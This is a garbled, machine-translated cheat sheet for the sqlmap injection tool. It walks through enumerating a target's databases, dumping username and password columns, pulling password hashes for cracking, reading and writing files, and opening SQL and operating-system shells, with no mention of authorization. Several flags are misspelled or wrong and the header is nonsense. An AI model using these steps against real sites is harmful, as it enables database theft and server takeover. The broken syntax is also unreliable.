Tag: DMI Union ST Table level does not perform a different error request
-u "(URL)"
1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据
The SQLMAP supports five different injection modes:
1, based on the Boolean blind, that can be based on the return page to determine the conditions of true and false injection. 2, the time-based blind, that can not be based on the page return content to determine any information, using conditional statements to see if the time Delay statement execution (that is, the page return time is increased) to determine. 3, based on the injection of error, that is, the page will return errors, or the results of injected statements directly back to the page. 4, joint query injection, you can use the union of the case of injection. 5, heap query injection, you can execute the execution of multiple statements at the same time injection.
If injection is supported, SQLMAP will show what type of injection is present
If you know what card type the database can specify
--dbms=mysql Oracle MSSQL, etc.
Then check to see if it is Dbasqlmap-u "url"--is-dba
If DBA authority is larger we can execute some commands or upload a shell.
Take a look at the user name
Sqlmap-u "url"--current-user
Check out what database you have.
Sqlmap-u "url"--dbs
If permissions are large, you can query across libraries
Look at the database currently in use
Sqlmap-u "url"--current-db
Check the table name of this database
Sqlmap-u "url"-D datebase--tables
The name of the table that saved the user name password may be admin password User Admin_user system manage member, etc.
Look at the column names
Sqlmap-u "url"-D datebase-t table--columns
Look at the data
Sqlmap-u "url"-D datebase-t table-c Username,password--dump
The above is simple to use
We can see what users are in the database.
Sqlmap-u "url"--users
You can view the password for the current database user
Sqlmap-u "url"--passwords
can choose to save hashes data with external program blasting password
Or choose a dictionary that comes with a dictionary or another directory, use Sqlmap to blast the code.
You can view the user's permissions (what commands can be executed)
Sqlmap-u "url"--privileges
Look at the schema of the database
Sqlmap-u "url"--schema--batch--exclude-sysdbs
-V Display of debug information 7 levels
0 only Python errors and critical information are displayed
1 displaying both basic and warning messages (default)
2 simultaneous display of debug information
3 Simultaneous display of payload
4 displaying HTTP requests at the same time
5 Displaying HTTP response header information at the same time
6 display HTTP corresponding page at the same time
Test statements can be found in the xml\payloads.xml can be studied
-m making a URL list file
Parameter--common-tables
You can use this parameter when you cannot get a database table with--tables
Applies to the following conditions
MySQL version less than 5.0 no INFORMATION_SCHEMA table
Database is a Microsoft Access system table msysobjects is unreadable (default)
The current user does not have permission to read the table that holds the data structure in the system.
Violent cracked table in/txt/common-tables.txt, you can add it yourself
--common-columns Ibid for column names
Cookie Injection
Sqlmap-u "cookie.sql.com/test.php"--cookie "id=11"--level 2
The parameter in the URL is appended to the cookie parameter, specifying a minimum of 2
The HTTP cookie is tested at level 2, and the HTTP User-agent/referer header is tested at Level 3.
Post form
Sqlmap-u "url"--form
Sqlmap-u "url"--date "username=123&password=123" (Hackbar Get)
Request delay request too fast may be blocked
--delay=5
File operations
Write
--file-read= ""
--file-write= ""
Command execution
Sql
--sql-query= "Statement"
--sql-shell returns a shell
System command execution
--os-cmd
--os-shell
--tamper Loading Scripts
Sqlmap Simple process Use